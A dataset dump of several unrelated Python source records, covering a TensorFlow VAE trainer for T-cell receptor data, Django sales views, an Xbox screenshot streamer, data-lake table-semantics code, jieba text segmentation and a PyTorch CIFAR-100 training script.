seq_losses.append(recon_cost_alpha)\n\n predicted_alpha = tf.squeeze(tf.argmax(input=logits_AE_alpha, axis=3), axis=1)\n actual_ae_alpha = tf.squeeze(GO.X_Seq_alpha, axis=1)\n w = tf.cast(tf.squeeze(tf.greater(GO.X_Seq_alpha, 0), 1), tf.float32)\n correct_ae_alpha = tf.reduce_sum(input_tensor=w * tf.cast(tf.equal(predicted_alpha, actual_ae_alpha), tf.float32), axis=1) / tf.reduce_sum(input_tensor=w, axis=1)\n accuracy_alpha = tf.reduce_mean(input_tensor=correct_ae_alpha, axis=0)\n seq_accuracies.append(accuracy_alpha)\n \n ## Gene\n gene_loss = []\n gene_accuracies = []\n if self.use_v_beta is True:\n v_beta_loss,v_beta_acc = Get_Gene_Loss(fc_up_flat,GO.embedding_layer_v_beta,GO.X_v_beta_OH,alpha=gene_alpha)\n gene_loss.append(v_beta_loss)\n gene_accuracies.append(v_beta_acc)\n\n if self.use_d_beta is True:\n d_beta_loss, d_beta_acc = Get_Gene_Loss(fc_up_flat,GO.embedding_layer_d_beta,GO.X_d_beta_OH,alpha=gene_alpha)\n gene_loss.append(d_beta_loss)\n gene_accuracies.append(d_beta_acc)\n\n if self.use_j_beta is True:\n j_beta_loss,j_beta_acc = Get_Gene_Loss(fc_up_flat,GO.embedding_layer_j_beta,GO.X_j_beta_OH,alpha=gene_alpha)\n gene_loss.append(j_beta_loss)\n gene_accuracies.append(j_beta_acc)\n\n if self.use_v_alpha is True:\n v_alpha_loss,v_alpha_acc = Get_Gene_Loss(fc_up_flat,GO.embedding_layer_v_alpha,GO.X_v_alpha_OH,alpha=gene_alpha)\n gene_loss.append(v_alpha_loss)\n gene_accuracies.append(v_alpha_acc)\n\n if self.use_j_alpha is True:\n j_alpha_loss,j_alpha_acc = Get_Gene_Loss(fc_up_flat,GO.embedding_layer_j_alpha,GO.X_j_alpha_OH,alpha=gene_alpha)\n gene_loss.append(j_alpha_loss)\n gene_accuracies.append(j_alpha_acc)\n\n recon_losses = seq_losses + gene_loss + rna_loss\n\n accuracies = seq_accuracies + gene_accuracies\n\n if use_only_gene:\n recon_losses = gene_loss\n accuracies = gene_accuracies\n if use_only_seq:\n recon_losses = seq_losses\n accuracies = seq_accuracies\n\n temp = []\n temp_seq = []\n temp_gene = []\n temp_rna = []\n\n for l in recon_losses:\n l = l[:,tf.newaxis]\n temp.append(l)\n for l_seq in seq_losses:\n l_seq = l_seq[:,tf.newaxis]\n temp_seq.append(l_seq)\n for l_gene in gene_loss:\n l_gene = l_gene[:,tf.newaxis]\n temp_gene.append(l_gene)\n for l_rna in rna_loss:\n l_rna = l_rna[:,tf.newaxis]\n temp_rna.append(l_rna)\n \n recon_losses = temp\n recon_losses = tf.concat(recon_losses,1)\n recon_cost = tf.reduce_sum(input_tensor=recon_losses, axis=1)\n recon_cost = tf.reduce_mean(input_tensor=recon_cost)\n\n temp_seq = tf.concat(temp_seq,1)\n seq_cost = tf.reduce_sum(input_tensor=temp_seq,axis=1)\n seq_cost = tf.reduce_mean(input_tensor=seq_cost)\n temp_gene = tf.concat(temp_gene,1)\n gene_cost = tf.reduce_sum(input_tensor=temp_gene,axis=1)\n gene_cost = tf.reduce_mean(input_tensor=gene_cost)\n temp_rna = tf.concat(temp_rna,1)\n rna_cost = tf.reduce_sum(input_tensor=temp_rna,axis=1)\n rna_cost = tf.reduce_mean(input_tensor=rna_cost)\n\n total_cost = [recon_losses,latent_cost[:,tf.newaxis]]\n total_cost = tf.concat(total_cost,1)\n total_cost = tf.reduce_sum(input_tensor=total_cost,axis=1)\n total_cost = tf.reduce_mean(input_tensor=total_cost)\n\n num_acc = len(accuracies)\n accuracy = 0\n for a in accuracies:\n accuracy += a\n accuracy = accuracy/num_acc\n latent_cost = tf.reduce_mean(input_tensor=latent_cost)\n\n opt_ae = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate).minimize(total_cost)\n\n GO.saver = tf.compat.v1.train.Saver(max_to_keep=None)\n\n self._reset_models()\n tf.compat.v1.reset_default_graph()\n config = 
tf.compat.v1.ConfigProto(allow_soft_placement=True)\n config.gpu_options.allow_growth = True\n\n with tf.compat.v1.Session(graph=graph_model_AE,config=config) as sess:\n sess.run(tf.compat.v1.global_variables_initializer())\n stop_check_list = []\n accuracy_list = []\n recon_loss = []\n train_loss = []\n latent_loss = []\n seq_loss_lst = []\n gene_loss_lst = []\n rna_loss_lst = []\n training = True\n e = 0\n while training:\n iteration = 0\n Vars = [self.X_Seq_alpha,self.X_Seq_beta,self.v_beta_num,self.d_beta_num,self.j_beta_num,\n self.v_alpha_num,self.j_alpha_num, self.mat]\n\n if split_seed is not None:\n np.random.seed(split_seed)\n\n for vars in get_batches(Vars, batch_size=batch_size,random=True):\n feed_dict = {}\n if self.use_alpha is True:\n feed_dict[GO.X_Seq_alpha] = vars[0]\n \n if self.use_beta is True:\n feed_dict[GO.X_Seq_beta] = vars[1]\n\n if self.use_v_beta is True:\n feed_dict[GO.X_v_beta] = vars[2]\n\n if self.use_d_beta is True:\n feed_dict[GO.X_d_beta] = vars[3]\n\n if self.use_j_beta is True:\n feed_dict[GO.X_j_beta] = vars[4]\n\n if self.use_v_alpha is True:\n feed_dict[GO.X_v_alpha] = vars[5]\n\n if self.use_j_alpha is True:\n feed_dict[GO.X_j_alpha] = vars[6]\n \n feed_dict[GO.mat] = vars[7]\n \n train_loss_i, recon_loss_i, seq_losses_i, gene_loss_i, rna_loss_i, latent_loss_i, accuracy_i, _ = sess.run([total_cost, recon_cost, seq_cost, gene_cost, rna_cost, latent_cost, accuracy, opt_ae], feed_dict=feed_dict)\n accuracy_list.append(accuracy_i)\n recon_loss.append(recon_loss_i)\n latent_loss.append(latent_loss_i)\n train_loss.append(train_loss_i)\n seq_loss_lst.append(seq_losses_i)\n gene_loss_lst.append(gene_loss_i)\n rna_loss_lst.append(rna_loss_i)\n \n if suppress_output is False:\n print(\"Epoch = {}, Iteration = {}\".format(e,iteration),\n \"Total Loss: {:.5f}:\".format(train_loss_i),\n \"Recon Loss: {:.5f}:\".format(recon_loss_i),\n \"CDR3 Loss: {:.5f}:\".format(seq_losses_i),\n \"Gene Loss: {:.5f}:\".format(gene_loss_i),\n \"RNA Loss: {:.5f}:\".format(rna_loss_i),\n \"Latent Loss: {:.5f}:\".format(latent_loss_i),\n \"Recon Accuracy: {:.5f}\".format(accuracy_i))\n\n if e >= epochs_min:\n if accuracy_min is not None:\n if np.mean(accuracy_list[-10:]) > accuracy_min:\n training = False\n break\n else:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n stop_check_list.append(stop_check(train_loss,stop_criterion,stop_criterion_window))\n if np.sum(stop_check_list[-3:]) >= 3:\n training = False\n break\n iteration += 1\n e += 1\n\n features_list = []\n accuracy_list = []\n alpha_features_list = []\n alpha_indices_list = []\n beta_features_list = []\n beta_indices_list = []\n RNA_list = []\n Vars = [self.X_Seq_alpha, self.X_Seq_beta, self.v_beta_num, self.d_beta_num, self.j_beta_num,\n self.v_alpha_num, self.j_alpha_num, self.mat]\n\n for vars in get_batches(Vars, batch_size=batch_size, random=False):\n feed_dict = {}\n if self.use_alpha is True:\n feed_dict[GO.X_Seq_alpha] = vars[0]\n if self.use_beta is True:\n feed_dict[GO.X_Seq_beta] = vars[1]\n\n if self.use_v_beta is True:\n feed_dict[GO.X_v_beta] = vars[2]\n\n if self.use_d_beta is True:\n feed_dict[GO.X_d_beta] = vars[3]\n\n if self.use_j_beta is True:\n feed_dict[GO.X_j_beta] = vars[4]\n\n if self.use_v_alpha is True:\n feed_dict[GO.X_v_alpha] = vars[5]\n\n if self.use_j_alpha is True:\n feed_dict[GO.X_j_alpha] = vars[6]\n\n feed_dict[GO.mat] = vars[7]\n\n get = z_mean\n features_ind, accuracy_check = sess.run([get, accuracy], feed_dict=feed_dict)\n features_list.append(features_ind)\n 
accuracy_list.append(accuracy_check)\n\n if self.use_alpha is True:\n alpha_ft, alpha_i = sess.run([GO.alpha_out,GO.indices_alpha],feed_dict=feed_dict)\n alpha_features_list.append(alpha_ft)\n alpha_indices_list.append(alpha_i)\n\n if self.use_beta is True:\n beta_ft, beta_i = sess.run([GO.beta_out,GO.indices_beta],feed_dict=feed_dict)\n beta_features_list.append(beta_ft)\n beta_indices_list.append(beta_i)\n\n rna_lowdim = sess.run([GO.rna_features],feed_dict=feed_dict)\n RNA_list.append(rna_lowdim)\n\n features = np.vstack(features_list)\n accuracy_list = np.hstack(accuracy_list)\n if self.use_alpha is True:\n self.alpha_features = np.vstack(alpha_features_list)\n self.alpha_indices = np.vstack(alpha_indices_list)\n\n if self.use_beta is True:\n self.beta_features = np.vstack(beta_features_list)\n self.beta_indices = np.vstack(beta_indices_list)\n\n self.rna_lowdim = np.vstack(RNA_list[0]) \n\n self.kernel = kernel\n #\n# if self.use_alpha is True:\n# var_save = [self.alpha_features, self.alpha_indices, self.alpha_sequences]\n# with open(os.path.join(self.Name, 'alpha_features.pkl'), 'wb') as f:\n# pickle.dump(var_save, f)\n\n# if self.use_beta is True:\n# var_save = [self.beta_features, self.beta_indices, self.beta_sequences]\n# with open(os.path.join(self.Name, 'beta_features.pkl'), 'wb') as f:\n# pickle.dump(var_save, f)\n \n# with open(os.path.join(self.Name, 'rna_features.pkl'), 'wb') as f:\n# pickle.dump(self.rna_lowdim, f)\n\n# with open(os.path.join(self.Name, 'kernel.pkl'), 'wb') as f:\n# pickle.dump(self.kernel, f)\n\n\n print('Reconstruction Accuracy: {:.5f}'.format(np.nanmean(accuracy_list)))\n\n embedding_layers = [GO.embedding_layer_v_alpha,GO.embedding_layer_j_alpha,\n GO.embedding_layer_v_beta,GO.embedding_layer_d_beta,\n GO.embedding_layer_j_beta]\n embedding_names = ['v_alpha','j_alpha','v_beta','d_beta','j_beta']\n name_keep = []\n embedding_keep = []\n for n,layer in zip(embedding_names,embedding_layers):\n if layer is not None:\n embedding_keep.append(layer.eval())\n name_keep.append(n)\n\n embed_dict = dict(zip(name_keep,embedding_keep))\n\n # sort features by variance explained\n cov = np.cov(features.T)\n explained_variance = np.diag(cov)\n ind = np.flip(np.argsort(explained_variance))\n explained_variance = explained_variance[ind]\n explained_variance_ratio = explained_variance / np.sum(explained_variance)\n features = features[:, ind]\n\n if var_explained is not None:\n features = features[:, 0:np.where(np.cumsum(explained_variance_ratio) > var_explained)[0][0] + 1]\n\n self.ind = ind[:features.shape[1]]\n #save model data and information for inference engine\n# save_model_data(self,GO.saver,sess,name='VAE',get=z_mean)\n\n with open(os.path.join(self.Name,'VAE_features.pkl'), 'wb') as f:\n pickle.dump([features,embed_dict,explained_variance,explained_variance_ratio], f,protocol=4)\n\n self.features = features\n self.embed_dict = embed_dict\n self.explained_variance_ = explained_variance\n self.explained_variance_ratio_ = explained_variance_ratio\n self.loss = train_loss\n self.latent_loss = latent_loss\n self.recon_loss = recon_loss\n \n with open(os.path.join(self.Name,'loss_accuracy.pkl'), 'wb') as f:\n pickle.dump([train_loss,latent_loss,recon_loss, accuracy_list], f,protocol=4)\n \n print('Training Done')\n ","repo_name":"biqing-zhu/scNAT","sub_path":"scNAT/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":49428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
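# A minimal standalone sketch of the variance-based latent-feature selection that the
# Train_VAE record above performs after training (np.cov -> np.diag -> argsort -> cumsum),
# assuming `features` is an (n_samples, latent_dim) numpy array. The helper name
# select_by_variance is hypothetical, and np.var is used in place of the covariance
# diagonal, which yields identical rankings and explained-variance ratios.
import numpy as np

def select_by_variance(features, var_explained=0.9):
    variance = np.var(features, axis=0)        # per-dimension variance (diagonal of the covariance matrix)
    order = np.flip(np.argsort(variance))      # dimensions sorted by descending variance
    ratio = variance[order] / variance.sum()   # explained-variance ratio per dimension
    keep = int(np.searchsorted(np.cumsum(ratio), var_explained)) + 1
    return features[:, order[:keep]], ratio[:keep]

# usage sketch: reduced, ratio = select_by_variance(np.random.randn(1000, 256), var_explained=0.9)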
+{"seq_id":"9850399408","text":"from django.shortcuts import render, HttpResponseRedirect\nfrom django.views.generic import ListView, CreateView\nfrom .models import Sale\nfrom .forms import create_form\nfrom django.urls import reverse\nfrom django.db.models import Sum, F\nfrom django.contrib import messages\nfrom account.decorators import allowed_users\n# Create your views here.\n\n\n# sales\n@allowed_users(allowed_roles=['Administrator', 'employee'])\ndef Home(request):\n # total_sales = Sale.objects.all().aggregate(Sum('amount'))\n # total_sales = Sale.objects.extra(select={'total': \"quantity * selling_price \"}).aggregate(Sum('total'))\n # total_sales = Sale.objects.filter(type=\"normal\").values('quantity').annotate(amount=Sum('id', field=\"width * height\")\n # total_sales = Sale.objects.all().extra(select={'total': \"quantity * selling_price\"}).values\n total_sales = Sale.objects.filter().aggregate(sum=Sum(F('quantity')*F('selling_price')))[\"sum\"]\n \n context = {\n 'object_list' : Sale.objects.all(),\n 'total' : total_sales\n }\n return render(request, 'sales.html', context)\n\n\ndef Add(request):\n form = create_form(request.POST or None)\n\n if form.is_valid():\n obj = form.save(commit=False)\n\n # selling_price = obj.product.selling_price\n\n # if selling_price == None:\n # messages.error(request, 'Selling Price is missing !')\n # return HttpResponseRedirect(reverse('sales:home'))\n \n # obj.selling_price = selling_price\n \n if obj.product.quantity > obj.quantity:\n obj.balance = obj.product.quantity - obj.quantity\n obj.save()\n messages.success(request, 'Your actions have been successfully saved !')\n else:\n messages.error(request, 'The quantity you are requesting for isn\\'t available !')\n\n\n return HttpResponseRedirect(reverse('sales:home'))\n\n \n return render(request, 'sales-add.html', {'form': form})\n\n\n@allowed_users(allowed_roles=['Administrator'])\ndef Edit(request, pk):\n object = Sale.objects.get(id=pk)\n form = create_form(request.POST or None, instance=object)\n\n if form.is_valid():\n form.save()\n request.session['message'] = True\n messages.success(request, 'Your actions have been successfully saved !')\n return HttpResponseRedirect(reverse('sales:home'))\n \n return render(request, 'sales-edit.html', {'form': form})\n\n\n@allowed_users(allowed_roles=['Administrator'])\ndef Delete(request):\n pk = request.POST['product']\n object = Sale.objects.get(id=pk)\n object.delete()\n messages.success(request, 'Your actions have been successfully saved !')\n return HttpResponseRedirect(reverse('sales:home'))\n\n","repo_name":"muhacodes/Depo","sub_path":"Sales/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18944667947","text":"import requests\r\nimport pygame\r\nimport os\r\nfrom PIL import Image\r\nfrom time import sleep\r\nip = input(\"please enter your xbox one ip \\n\")\r\npygame.init()\r\n(width, height) = (1920, 1080)\r\nscreen = pygame.display.set_mode((width, height))\r\nwhile True:\r\n # skip TLS verification (the console's device portal uses a self-signed certificate)\r\n image = requests.get('https://'+ ip +':11443/ext/screenshot?download=true', verify=False)\r\n with open(\"i.png\", 'wb') as file:\r\n file.write(image.content)\r\n im = Image.open(\"i.png\")\r\n rgb_im = im.convert('RGB')\r\n rgb_im.save('j.jpg')\r\n bg = pygame.image.load(\"j.jpg\")\r\n screen.blit(bg,(0,0))\r\n pygame.display.update()\r\n pygame.event.pump()  # keep the window responsive between frames\r\n","repo_name":"tunip3/shitty-stream-for-xbox-one","sub_path":"shittystream.py","file_name":"shittystream.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"24260016556","text":"# -*- coding: utf-8 -*-\n\n\n#from tkinter import E\nimport numpy as np\nimport pandas as pd\nimport csv\nimport glob\nimport time\nimport os.path\nfrom pathlib import Path\nimport sys\nimport re \n# needed by extractNouns and expandQuery below\nfrom nltk.corpus import stopwords\nfrom nltk import word_tokenize, pos_tag\n\n\n#This function takes a column and determines whether it is text or numeric column\n#This has been done using a well-known information retrieval technique\n#Check each cell to see if it is text. Then if enough number of cells are \n#text, the column is considered as a text column.\ndef getColumnType(attribute, column_threshold=.5, entity_threshold=.5):\n attribute = [item for item in attribute if str(item) != \"nan\"]\n if len(attribute) == 0:\n return 0\n strAttribute = [item for item in attribute if type(item) == str]\n strAtt = [item for item in strAttribute if not item.isdigit()]\n for i in range(len(strAtt)-1, -1, -1):\n entity = strAtt[i]\n num_count = 0\n for char in entity:\n if char.isdigit():\n num_count += 1\n if num_count/len(entity) > entity_threshold:\n del strAtt[i] \n if len(strAtt)/len(attribute) > column_threshold:\n return 1\n else:\n return 0\n \n#removes punctuations and whitespaces from string. The same preprocessing\n#is done in yago label file\ndef preprocessString(string):\n string = re.sub(r'[^\\w]', ' ', string)\n string = string.replace(\"nbsp\",'')\n string =\" \".join(string.split())\n return (string)\n\n#removes punctuations and whitespaces from list items\ndef preprocessListValues(valueList):\n valueList = [x.lower() for x in valueList if checkIfNullString(x) !=0]\n valueList = [re.sub(r'[^\\w]', ' ', string) for string in valueList]\n valueList = [x.replace('nbsp','') for x in valueList ] #remove html whitespace\n valueList = [\" \".join(x.split()) for x in valueList]\n return valueList\n\n#checks different types of nulls in string\ndef checkIfNullString(string):\n nullList = ['nan','-','unknown','other (unknown)','null','na', \"\", \" \"]\n if str(string).lower() not in nullList:\n return 1\n else:\n return 0\n \n#remove hyphen and whitespaces from the table name\ndef cleanTableName(string):\n tableName = string.replace(\"-\",\"\")\n tableName = ' '.join(tableName.split(\"_\"))\n tableName = '_'.join(tableName.split())\n return tableName\n\n#needed if direct hit is not found in the KB\ndef extractNouns(stringList):\n sentence = ' '.join(item for item in stringList)\n nouns = [token for token, pos in pos_tag(word_tokenize(sentence)) if pos.startswith('N')]\n return nouns\n\n#extracts tokens from the cell value or value list\ndef expandQuery(stringList):\n stringList = [item for item in stringList if type(item) == str]\n stringList = preprocessListValues(stringList)\n nounList = extractNouns(stringList)\n expandedQueryList = [words for segments in nounList for words in segments.split()]\n # handle phrase queries\n removeNouns = []\n for entity in expandedQueryList:\n entityList = entity.split(\" \")\n if entityList.count('') > 0 and entityList.count('') <= 2:\n entityList.remove('')\n index = 0\n while index <= len(entityList) - 1:\n word = entityList[index]\n if word in nounList:\n if index + 1 < len(entityList):\n nextWord = entityList[index + 1]\n if entityList[index + 1] in 
nounList:\n removeNouns.append(word)\n removeNouns.append(entityList[index + 1])\n expandedQueryList.append(word + \" \" + entityList[index + 1])\n index += 1\n index += 1\n \n finalNouns = [noun for noun in expandedQueryList if noun not in removeNouns]\n stopWordsRemovedList= [word for word in finalNouns if word.lower() not in stopwords.words('english')]\n return (list(set(stopWordsRemovedList)))\n\n\ndef getMatchingTables(item, weight, parameter): \n returnList = []\n #print(merge)\n for each in item:\n temp = each\n tableName = temp[0]\n #tableName = cleanTableName(temp[0])\n tableScore = temp[-1] * weight *parameter\n returnList.append((tableName, tableScore))\n return returnList\n\n\n#compute synthesized CS for the query table\ndef computeSynthColumnSemantics(input_table, synth_type_kb):\n #synthInvertedIndex = {}\n all_column_semantics = {}\n col_id = 0\n for (columnName, columnData) in input_table.iteritems():\n sem = {}\n #creating the lookup table for data lake tables\n if getColumnType(input_table[columnName].tolist()) == 1:\n #print(table_name)\n input_table[columnName] = input_table[columnName].map(str)\n valueList = preprocessListValues(input_table[columnName].unique()) \n hit_found = 0 \n #find bag of semantics for each column\n for value in valueList:\n if value in synth_type_kb:\n item = synth_type_kb[value]\n hit_found += 1\n for temp in item:\n semName = temp[0]\n semScore = temp[-1] \n if semName in sem:\n sem[semName] +=semScore\n else:\n sem[semName] = semScore\n for every in sem:\n sem[every] = sem[every]/hit_found\n\n if str(col_id) in all_column_semantics:\n print(\"red flag!!!\")\n else:\n all_column_semantics[str(col_id)] = sem\n col_id += 1\n return all_column_semantics\n\n#compute synthesized relationship semantics for the query table\ndef computeSynthRelation(inputTable, subjectIndex, synthKB):\n label = \"r\"\n synth_triple_dict = {}\n total_cols = inputTable.shape[1]\n subject_semantics = set()\n for i in range(0, total_cols -1): \n if getColumnType(inputTable.iloc[:,i].tolist()) == 1: #the subject in rdf triple should be a text column\n for j in range(i+1, total_cols):\n if getColumnType(inputTable.iloc[:,j].tolist()) == 1: #the subject in rdf triple should be a text column\n mergeRelSem = {}\n dataFrameTemp = inputTable.iloc[:,[i,j]]\n dataFrameTemp = (dataFrameTemp.drop_duplicates()).dropna()\n projectedRowsNum = dataFrameTemp.shape[0]\n \n #find relation semantics for each value pairs of subjectIndex and j\n for k in range(0,projectedRowsNum):\n #extract subject and object\n sub = preprocessString(str(dataFrameTemp.iloc[k][0]).lower())\n obj = preprocessString(str(dataFrameTemp.iloc[k][1]).lower())\n subNull = checkIfNullString(sub)\n objNull = checkIfNullString(obj)\n if subNull != 0 and objNull != 0:\n item = []\n value = sub+\"__\"+obj\n if value in synthKB:\n item = synthKB[value]\n \n else:\n value = obj+\"__\"+sub\n if value in synthKB:\n item = synthKB[value]\n \n if len(item) > 0 :\n for each in item:\n temp = each\n if temp[-1] >0:\n semName = temp[0]\n semScore = temp[-1] \n if semName in mergeRelSem:\n mergeRelSem[semName] +=semScore/projectedRowsNum\n else:\n mergeRelSem[semName] = semScore/projectedRowsNum\n \n\n triple_list = []\n for sem in mergeRelSem:\n triple_list.append((sem, mergeRelSem[sem]))\n \n synth_triple_dict[str(i) + \"-\" + str(j)] = triple_list\n if int(subjectIndex) == i or int(subjectIndex) == j:\n for sem in mergeRelSem:\n subject_semantics.add(sem)\n return synth_triple_dict, subject_semantics\n \n#compute KB RS for the 
query table\ndef computeRelationSemantics(input_table, tab_id, LABEL_DICT, FACT_DICT):\n total_cols = input_table.shape[1]\n relation_dependencies = []\n entities_finding_relation = {}\n relation_dictionary = {}\n #compute relation semantics\n for i in range(0, total_cols-1):\n #print(\"i=\",i)\n if getColumnType(input_table.iloc[:, i].tolist()) == 1: \n #the subject in rdf triple should be a text column\n for j in range(i+1, total_cols):\n semantic_dict_forward = {}\n semantic_dict_backward = {}\n column_pairs = input_table.iloc[:, [i, j]]\n column_pairs = (column_pairs.drop_duplicates()).dropna()\n unique_rows_in_pair = column_pairs.shape[0]\n total_kb_forward_hits = 0\n total_kb_backward_hits = 0\n for k in range(0, unique_rows_in_pair):\n #extract subject and object\n subject_value = preprocessString(str(column_pairs.iloc[k][0]).lower())\n object_value = preprocessString(str(column_pairs.iloc[k][1]).lower())\n is_sub_null = checkIfNullString(subject_value)\n is_obj_null = checkIfNullString(object_value)\n if is_sub_null != 0:\n sub_entities = LABEL_DICT.get(subject_value, \"None\")\n if sub_entities != \"None\":\n if is_obj_null != 0: \n obj_entities = LABEL_DICT.get(object_value, \"None\")\n if obj_entities != \"None\":\n #As both are not null, search for relation semantics\n for sub_entity in sub_entities:\n for obj_entity in obj_entities:\n #preparing key to search in the fact file\n entity_forward = sub_entity + \"__\" + obj_entity\n entity_backward = obj_entity + \"__\" + sub_entity\n relation_forward = FACT_DICT.get(entity_forward, \"None\")\n relation_backward = FACT_DICT.get(entity_backward, \"None\")\n if relation_forward != \"None\":\n total_kb_forward_hits += 1\n #keep track of the entity finding relation. We will use this to speed up the column semantics search\n key = str(i)+\"_\"+subject_value\n if key not in entities_finding_relation:\n entities_finding_relation[key] = {sub_entity}\n else:\n entities_finding_relation[key].add(sub_entity)\n key = str(j) + \"_\" + object_value\n if key not in entities_finding_relation:\n entities_finding_relation[key] = {obj_entity}\n else:\n entities_finding_relation[key].add(obj_entity)\n for s in relation_forward:\n if s in semantic_dict_forward:\n semantic_dict_forward[s] += 1 #relation semantics in forward direction\n else:\n semantic_dict_forward[s] = 1\n if relation_backward != \"None\":\n total_kb_backward_hits += 1\n #keep track of the entity finding relation. 
We will use this for column semantics search\n key = str(i)+\"_\"+subject_value\n if key not in entities_finding_relation:\n entities_finding_relation[key] = {sub_entity}\n else:\n entities_finding_relation[key].add(sub_entity)\n \n key = str(j)+\"_\"+object_value\n if key not in entities_finding_relation:\n entities_finding_relation[key] = {obj_entity}\n else:\n entities_finding_relation[key].add(obj_entity)\n \n for s in relation_backward:\n if s in semantic_dict_backward:\n semantic_dict_backward[s] += 1 #relation semantics in reverse direction\n else:\n semantic_dict_backward[s] = 1\n if len(semantic_dict_forward) > 0:\n relation_dependencies.append(str(i)+\"-\"+str(j))\n relation_dictionary[str(i)+\"-\"+str(j)] = [(max(semantic_dict_forward, key=semantic_dict_forward.get), max(semantic_dict_forward.values())/ total_kb_forward_hits)]\n if len(semantic_dict_backward) >0:\n relation_dependencies.append(str(j)+\"-\"+str(i))\n relation_dictionary[str(j)+\"-\"+str(i)] = [(max(semantic_dict_backward, key=semantic_dict_backward.get), max(semantic_dict_backward.values())/ total_kb_backward_hits)]\n return entities_finding_relation, relation_dependencies, relation_dictionary\n\n#yago column semantics for query table\ndef computeColumnSemantics(input_table, subject_index, LABEL_DICT, TYPE_DICT, CLASS_DICT, RELATION_DICT):\n col_id = 0\n not_found_in_yago = []\n column_dictionary = {}\n subject_semantics = \"\"\n for (columnName, columnData) in input_table.iteritems():\n if getColumnType(input_table[columnName].tolist()) == 1: #check column Type\n input_table[columnName] = input_table[columnName].map(str) \n #get unique values in the column and preprocess them.\n value_list = preprocessListValues(input_table[columnName].unique())\n #search values in KB \n all_found_types = {}\n total_kb_hits = 0\n if str(subject_index) == str(col_id):\n label = \"sc\"\n else:\n label = \"c\"\n for value in value_list:\n current_entities = set()\n current_types = set()\n current_entities = RELATION_DICT.get(str(col_id) + \"_\"+ value, \"None\")\n #print(current_entities)\n if current_entities != \"None\":\n total_kb_hits += 1\n for entity in current_entities:\n if entity in TYPE_DICT:\n temp_type = TYPE_DICT[entity]\n for entity_type in temp_type:\n current_types.add(entity_type)\n for each_type in current_types:\n if each_type in all_found_types:\n all_found_types[each_type] +=1\n else:\n all_found_types[each_type] = 1 \n else: \n current_entities = LABEL_DICT.get(value, \"None\")\n if current_entities != \"None\": #found in KB\n total_kb_hits += 1\n for entity in current_entities:\n if entity in TYPE_DICT:\n temp_type = TYPE_DICT[entity]\n for entity_type in temp_type:\n current_types.add(entity_type)\n for each_type in current_types:\n if each_type in all_found_types:\n all_found_types[each_type] +=1\n else:\n all_found_types[each_type] = 1 \n \n #find the top-level type with highest count.\n all_top_types = [v for v in sorted(all_found_types.items(), key=lambda kv: (-kv[1], kv[0])) if v[0] in CLASS_DICT]\n if all_top_types:\n selected_top_type = all_top_types[0][0]\n top_type_count = all_top_types[0][1]\n if label == \"sc\":\n subject_semantics = selected_top_type\n children_of_top_types = CLASS_DICT[selected_top_type]\n #add children of top types to the bag of word\n for each in all_found_types:\n if each in children_of_top_types and (all_found_types[each] / top_type_count) >= 0:\n if int(col_id) not in column_dictionary:\n column_dictionary[int(col_id)] = [(each, all_found_types[each]/total_kb_hits)]\n 
else:\n column_dictionary[int(col_id)].append((each, all_found_types[each]/total_kb_hits))\n col_id += 1\n \n return column_dictionary, subject_semantics\n\n\n","repo_name":"northeastern-datalab/dialite","sub_path":"santos/codes/santos.py","file_name":"santos.py","file_ext":"py","file_size_in_byte":18546,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"9957633564","text":"import glob\nimport os\n\nimport jieba\n\n\n# 对弹幕进行分词操作\ndef bullet_screen_separate():\n # 读取要分析的文本\n bullet_screen_dir = \"../data/weekly_list/\"\n txt_files = glob.glob(os.path.join(bullet_screen_dir, '*combined_strings.txt'))\n\n for txt_file in txt_files:\n with open(txt_file, 'r', encoding=\"utf8\") as file:\n content = file.read()\n seg_list = jieba.cut(content)\n seg_list = [word for word in seg_list if len(word) > 1]\n\n year = txt_file.split('_combined')[0]\n separate_dir = f\"{year}_separate.txt\"\n\n # 将分词结果写入文件\n with open(file=separate_dir, mode=\"w\", encoding=\"utf-8\") as f:\n f.write(\" \".join(seg_list))\n\n\nbullet_screen_separate()\n","repo_name":"Jakesoso/bilibili_analysis","sub_path":"bilibili_data_graph/wordcloud/separate_bullet_screen.py","file_name":"separate_bullet_screen.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"594959340","text":"import numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.datasets as dsets\nimport torchvision.transforms as transforms\n\nfrom torchsummary import summary\nfrom tqdm.auto import tqdm\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import figure\nimport pandas as pd\nimport time\nfrom ptflops import get_model_complexity_info\n\nfrom mobilenet_model import *\n\nBATCH_SIZE = 1024\nNUM_EPOCH = 10\nLEARNING_RATE = 1e-3\nCRITERION = nn.CrossEntropyLoss()\n\n\n# %%\n# CIFAR100 Dataset\ntrain_dataset = dsets.CIFAR100(root='./data', train=True, \n transform=transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ]), download=True)\ntest_dataset = dsets.CIFAR100(root='./data', train=False,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ]))\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=BATCH_SIZE, shuffle=True)\ntest_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=BATCH_SIZE, shuffle=False)\n\n\n# %%\n# Assign model and optimizer\n\ntorch.cuda.empty_cache()\nres = torch.hub.load('pytorch/vision:v0.6.0', 'resnet50', pretrained=False).cuda()\nires = MobileNetV2(num_classes=100).cuda()\n\n# model, losses, train_acc = fit(plainnet_model, train_loader)\noptimizer1 = torch.optim.Adam(res.parameters(), lr=LEARNING_RATE, weight_decay=1e-4)\noptimizer2 = torch.optim.Adam(ires.parameters(), 